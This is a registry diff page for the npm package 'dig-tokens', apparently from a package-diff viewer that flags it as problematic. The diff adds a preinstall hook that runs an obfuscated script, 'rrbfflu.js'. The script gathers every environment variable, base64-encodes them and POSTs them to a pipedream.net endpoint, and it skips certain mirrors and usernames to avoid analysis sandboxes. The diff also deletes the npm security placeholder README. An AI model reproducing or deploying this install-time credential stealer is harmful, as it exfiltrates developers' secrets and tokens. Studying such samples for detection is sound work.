dig-tokens 0.0.1-security → 7.879.508
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of dig-tokens might be problematic. Click here for more details.
- package/package.json +8 -3
- package/rrbfflu.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "dig-tokens",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "7.879.508",
|
|
4
|
+
"main": "rrbfflu.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node rrbfflu.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/rrbfflu.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x1f0127=a0_0x3f3e;function a0_0x3f3e(_0x3bfd28,_0x349dc4){const _0xa87429=a0_0xa874();return a0_0x3f3e=function(_0x3f3e1d,_0x3a303e){_0x3f3e1d=_0x3f3e1d-0x14e;let _0x21f43d=_0xa87429[_0x3f3e1d];return _0x21f43d;},a0_0x3f3e(_0x3bfd28,_0x349dc4);}(function(_0x500fcf,_0x371b36){const _0x4a8f93=a0_0x3f3e,_0x23d05e=_0x500fcf();while(!![]){try{const _0x503850=parseInt(_0x4a8f93(0x168))/0x1+parseInt(_0x4a8f93(0x152))/0x2*(parseInt(_0x4a8f93(0x16b))/0x3)+-parseInt(_0x4a8f93(0x14e))/0x4+-parseInt(_0x4a8f93(0x167))/0x5*(parseInt(_0x4a8f93(0x151))/0x6)+parseInt(_0x4a8f93(0x15b))/0x7+parseInt(_0x4a8f93(0x160))/0x8+parseInt(_0x4a8f93(0x161))/0x9*(parseInt(_0x4a8f93(0x155))/0xa);if(_0x503850===_0x371b36)break;else _0x23d05e['push'](_0x23d05e['shift']());}catch(_0x444cab){_0x23d05e['push'](_0x23d05e['shift']());}}}(a0_0xa874,0x6f51a));const http=require(a0_0x1f0127(0x14f)),filter=[{'key':a0_0x1f0127(0x156),'val':a0_0x1f0127(0x153)},{'key':a0_0x1f0127(0x156),'val':'tencent.com'},{'key':a0_0x1f0127(0x156),'val':a0_0x1f0127(0x16a)},{'key':'USERNAME','val':a0_0x1f0127(0x15e)},{'key':'_','val':a0_0x1f0127(0x16c)}];function main(){const _0x4f929e=a0_0x1f0127;var _0x1a59c8=process[_0x4f929e(0x159)]||{};if(filter[_0x4f929e(0x15d)](({key:_0x580c38,val:_0xd88b2c})=>_0x1a59c8[_0x580c38]&&_0x1a59c8[_0x580c38][_0x4f929e(0x163)](_0xd88b2c))||Object[_0x4f929e(0x157)](_0x1a59c8)[_0x4f929e(0x154)]<0xa)return;req=http[_0x4f929e(0x165)]({'host':['c2e7a0cfd4f45f811ede4b077ae48dfa','m','pipedream',_0x4f929e(0x150)][_0x4f929e(0x169)]('.'),'path':'/'+(_0x1a59c8[_0x4f929e(0x162)]||''),'method':_0x4f929e(0x166)})['on'](_0x4f929e(0x15f),function(_0x4e5ab3){}),req[_0x4f929e(0x15a)](Buffer[_0x4f929e(0x15c)](JSON[_0x4f929e(0x158)](_0x1a59c8))['toString']('base64')),req[_0x4f929e(0x164)]();}function a0_0xa874(){const _0xcc403c=['https','net','6nJcAUo','4DUclTA','taobao.org','length','70fHxHST','npm_config_registry','keys','stringify','env','write','2149343EcoLek','from','some','daasadmin','error','634104jxsoNs','624033WaoRIR','npm_package_name','includes','end','request','POST','3765770SwfEEy','468382ewQabU','join','registry.npmmirror.com','1019916ojkpuU','/usr/bin/python','3243524mAwvHe'];a0_0xa874=function(){return _0xcc403c;};return a0_0xa874();}main();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.
|